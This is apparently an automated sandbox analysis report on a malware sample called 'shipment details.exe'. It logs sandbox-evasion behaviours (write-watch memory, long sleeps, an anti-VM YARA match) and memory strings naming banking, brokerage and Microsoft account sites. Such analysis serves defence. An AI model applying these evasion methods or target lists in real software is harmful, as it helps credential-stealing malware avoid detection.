Source: C:\Users\user\Desktop\shipment details.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: shipment details.exe PID: 5564, type: MEMORYSTR
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\shipment details.exe Memory allocated: CF0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Memory allocated: 2AD0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Memory allocated: 28D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Memory allocated: 1330000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Memory allocated: 2DA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Memory allocated: 4DA0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 599672 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 599343 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 599224 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598968 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598856 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598732 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598625 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598515 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598406 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598297 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598187 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598078 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597968 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597859 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597745 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597640 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597531 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597415 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597312 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597203 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597093 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596984 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596875 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596765 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596656 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596546 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596437 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596326 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596218 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596109 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596000 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595890 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595781 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595672 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595562 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595453 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595343 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595234 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595125 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595015 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 594906 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 594797 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 594687 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 594578 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\shipment details.exe Window / User API: threadDelayed 2008 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Window / User API: threadDelayed 7806 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep count: 32 > 30 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -29514790517935264s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -599890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 2672 Thread sleep count: 2008 > 30 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 2672 Thread sleep count: 7806 > 30 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -599781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -599672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -599562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -599453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -599343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -599224s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -599109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -598968s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -598856s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -598732s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -598625s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -598515s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -598406s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -598297s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -598187s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -598078s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -597968s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -597859s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -597745s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -597640s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -597531s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -597415s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -597312s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -597203s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -597093s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -596984s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -596875s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -596765s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -596656s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -596546s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -596437s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -596326s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -596218s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -596109s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -596000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -595890s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -595781s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -595672s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -595562s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -595453s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -595343s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -595234s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -595125s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -595015s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -594906s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -594797s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -594687s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe TID: 6220 Thread sleep time: -594578s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 599672 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 599343 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 599224 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598968 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598856 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598732 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598625 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598515 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598406 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598297 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598187 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 598078 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597968 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597859 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597745 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597640 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597531 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597415 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597312 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597203 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 597093 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596984 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596875 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596765 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596656 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596546 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596437 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596326 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596218 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596109 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 596000 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595890 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595781 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595672 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595562 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595453 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595343 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595234 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595125 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 595015 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 594906 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 594797 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 594687 Jump to behavior
Source: C:\Users\user\Desktop\shipment details.exe Thread delayed: delay time: 594578 Jump to behavior
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000003E34000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: shipment details.exe, 00000001.00000002.4523597772.0000000004153000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
